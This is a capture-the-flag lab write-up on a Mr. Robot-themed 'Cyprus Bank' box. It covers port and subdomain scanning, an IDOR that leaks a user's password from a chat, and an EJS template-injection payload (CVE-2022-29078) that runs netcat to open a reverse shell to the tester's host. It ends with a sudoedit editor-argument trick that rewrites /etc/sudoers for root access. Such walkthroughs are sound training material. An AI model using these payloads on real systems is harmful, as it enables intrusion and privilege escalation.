Yet another Mr. Robot themed challenge.
$ nmap 10.10.200.189 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 21:14 IST
Nmap scan report for 10.10.200.189
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_ 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo echo "<IP> cyprusbank.thm"|sudo tee -a /etc/hosts
$ ffuf -w /snap/seclists/572/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1 -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cyprusbank.thm/
:: Wordlist : FUZZ: /snap/seclists/572/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.cyprusbank.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
www [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 157ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 164ms]
:: Progress: [114441/114441] :: Job [1/1] :: 1240 req/sec :: Duration: [0:01:37] :: Errors: 0 ::
sudo echo "<IP> cyprusbank.thm admin.cyprusbank.thm" | sudo tee -a /etc/hosts
As I checked, I noticed that we have limited permissions with this account, which prevents us from taking any significant actions. However, while navigating to the messages section, I discovered some intriguing chats between Olivia and Gayle. By modifying the URL parameter to set the value of /?c=
to 0 and then to 10, I was able to retrieve Gayle's password through an IDOR (Insecure Direct Object Reference) vulnerability.
Cyprus National Bank - Admin Chat
Gayle Bev: Of course! My password is 'p~]P@5!6;rs558:q'
DEV TEAM: Alright we are trying to implement chat history, everything should be ready in week or so
Gayle Bev: That's nice to hear!
Gayle Bev: Developers implemented this new messaging feature that I suggested! What you guys think?
Greger Ivayla: Looks really cool!
Jemmy Laurel: Hey have you guys seen Mrs. Jacobs recently??
Olivia Cortez: No she hasn't been around for a while
Jemmy Laurel: Oh, is she OK?
After testing the name and password parameters for vulnerabilities such as SQL injection, XSS, and SSTI, we didn't find any issues. Let's intercept this request in Burp Suite to investigate further.
Upon closely examining I discovered that EJS Server-side template injection, which could potentially lead to RCE (Remote Code Execution) and We get the shell here.
Only a limited number of options can typically be passed with the data. However, the CVE-2022-29078 vulnerability allows us to bypass this restriction. By using the settings['view options']
parameter, we can pass any option without limitation.
name=a&password=a&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc 10.17.11.253 1234 -e bash');s
nc -lnvp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'
$ nc -lnvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.200.189 56326
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@cyprusbank:~/app$
cat /home/web/user.txt
THM{4lw_____!3s}
web@cyprusbank:~$ sudo -l
sudo -l
Matching Defaults entries for web on cyprusbank:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User web may run the following commands on cyprusbank:
(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
web@cyprusbank:~$
export TERM=xterm
web@cyprusbank:~/app$ export TERM=xterm
export TERM=xterm
web@cyprusbank:~/app$ ^Z
[1]+ Stopped nc -lnvp 1234
death@esther:~$ stty raw -echo; fg
nc -lnvp 1234
web@cyprusbank:~/app$
We see that we can run sudoedit
as root without a password for this file /etc/nginx/sites-available/admin.cyprusbank.thm
export EDITOR="nano -- /etc/sudoers"
sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
web ALL=(root) NOPASSWD: ALL
sudo su
web@cyprusbank:~/app$ export SUDO_EDITOR='nano -- /etc/sudoers'
web@cyprusbank:~/app$ sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
sudoedit: --: editing files in a writable directory is not permitted
web@cyprusbank:~/app$ sudo su
root@cyprusbank:/home/web/app# cat /root/root.txt
THM{4nd_****4g3s}
root@cyprusbank:/home/web/app#
done